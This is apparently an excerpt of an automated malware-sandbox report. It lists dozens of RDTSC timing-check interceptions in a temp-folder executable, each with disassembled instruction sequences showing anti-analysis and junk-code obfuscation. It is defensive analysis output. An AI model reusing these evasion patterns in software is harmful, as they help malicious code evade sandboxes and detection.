                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A46F second address: 92A48B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C842Bh 0x00000008 jmp 00007FD81D0C842Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A765 second address: 92A769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A769 second address: 92A76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A9D0 second address: 92A9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A9D5 second address: 92A9EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD81D0C8432h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A9EC second address: 92A9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A9F4 second address: 92AA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92AA00 second address: 92AA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FD81C88825Dh 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92F633 second address: 92F63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92F63B second address: 92F65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81C88825Fh 0x00000009 push edi 0x0000000a pop edi 0x0000000b jns 00007FD81C888256h 0x00000011 popad 0x00000012 pop ecx 0x00000013 push edi 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 932065 second address: 93206A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 932245 second address: 932266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888265h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FD81C888256h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 9322F9 second address: 932303 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 932303 second address: 93230D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD81C888256h 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 93230D second address: 93232C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub dh, 0000001Fh 0x0000000c push 00000004h 0x0000000e mov dx, FA85h 0x00000012 push EE34E7E2h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB065B second address: 4BB066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB066A second address: 4BB0670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB0670 second address: 4BB0674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB0674 second address: 4BB068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD81D0C842Dh 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB068C second address: 4BB06C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FD81C888263h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FD81C88825Fh 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov di, ax 0x0000001a movzx ecx, di 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB06C8 second address: 4BB06F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD81D0C8432h 0x0000000a jmp 00007FD81D0C8435h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70F0E second address: 4B70FAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD81C888266h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FD81C888261h 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 pushfd 0x0000001a jmp 00007FD81C888267h 0x0000001f sub ch, 0000000Eh 0x00000022 jmp 00007FD81C888269h 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a jmp 00007FD81C88825Eh 0x0000002f mov ebp, esp 0x00000031 jmp 00007FD81C888260h 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c mov ax, di 0x0000003f popad 0x00000040 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0885 second address: 4BC08D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD81D0C8437h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FD81D0C8436h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD81D0C8437h 0x0000001d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B30BB2 second address: 4B30BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B30BB8 second address: 4B30BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B30BBC second address: 4B30BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B30BC0 second address: 4B30C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD81D0C842Fh 0x00000010 sbb al, FFFFFF9Eh 0x00000013 jmp 00007FD81D0C8439h 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b call 00007FD81D0C842Eh 0x00000020 pop eax 0x00000021 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B30C08 second address: 4B30C38 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007FD81C88825Ah 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD81C888267h 0x00000019 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B30C38 second address: 4B30C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f mov cx, B60Fh 0x00000013 popad 0x00000014 push dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD81D0C842Ch 0x00000020 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B30C73 second address: 4B30C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B30C77 second address: 4B30C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B30C7D second address: 4B30C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81C88825Dh 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70BE6 second address: 4B70C07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FD81D0C842Bh 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70C07 second address: 4B70C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70C0D second address: 4B70C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70C11 second address: 4B70C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD81C888269h 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70C35 second address: 4B70C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70C3B second address: 4B70C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70C3F second address: 4B70C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70C43 second address: 4B70C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70C52 second address: 4B70C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70C56 second address: 4B70C5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B609F4 second address: 4B60A18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 9Bh 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FD81D0C8432h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60A18 second address: 4B60A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60A1C second address: 4B60A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60A22 second address: 4B60AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007FD81C888261h 0x0000000c jmp 00007FD81C88825Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FD81C888266h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD81C88825Dh 0x00000026 and ch, FFFFFFC6h 0x00000029 jmp 00007FD81C888261h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FD81C888260h 0x00000035 adc cx, D568h 0x0000003a jmp 00007FD81C88825Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60AAB second address: 4B60AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60AB1 second address: 4B60AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60AB5 second address: 4B60ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD81D0C842Ah 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60ACA second address: 4B60ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC010E second address: 4BC012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C8439h 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC012B second address: 4BC014F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD81C888269h 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC014F second address: 4BC018D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FD81D0C842Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 jmp 00007FD81D0C842Dh 0x00000019 popad 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC018D second address: 4BC0191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0191 second address: 4BC0197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0197 second address: 4BC019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0008 second address: 4BC000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC000C second address: 4BC0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0012 second address: 4BC005C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81D0C8431h 0x00000009 add esi, 2FEC3CB6h 0x0000000f jmp 00007FD81D0C8431h 0x00000014 popfd 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD81D0C8432h 0x00000025 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC005C second address: 4BC0060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0060 second address: 4BC0066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0066 second address: 4BC006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC006C second address: 4BC0070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0070 second address: 4BC0074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0074 second address: 4BC0091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD81D0C842Eh 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0091 second address: 4BC00A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC00A0 second address: 4BC00CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD81D0C842Dh 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70CE9 second address: 4B70D56 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD81C888263h 0x00000008 sub ah, 0000006Eh 0x0000000b jmp 00007FD81C888269h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD81C88825Ch 0x0000001d or eax, 6C954FE8h 0x00000023 jmp 00007FD81C88825Bh 0x00000028 popfd 0x00000029 movzx eax, dx 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FD81C88825Eh 0x00000035 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC051B second address: 4BC0521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0521 second address: 4BC0525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0525 second address: 4BC0529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0529 second address: 4BC0589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c mov bx, 3CC0h 0x00000010 pushfd 0x00000011 jmp 00007FD81C888269h 0x00000016 and ax, 94C6h 0x0000001b jmp 00007FD81C888261h 0x00000020 popfd 0x00000021 popad 0x00000022 and dword ptr [eax+04h], 00000000h 0x00000026 pushad 0x00000027 mov edx, eax 0x00000029 mov ebx, esi 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FD81C888261h 0x00000034 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0589 second address: 4BC058F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
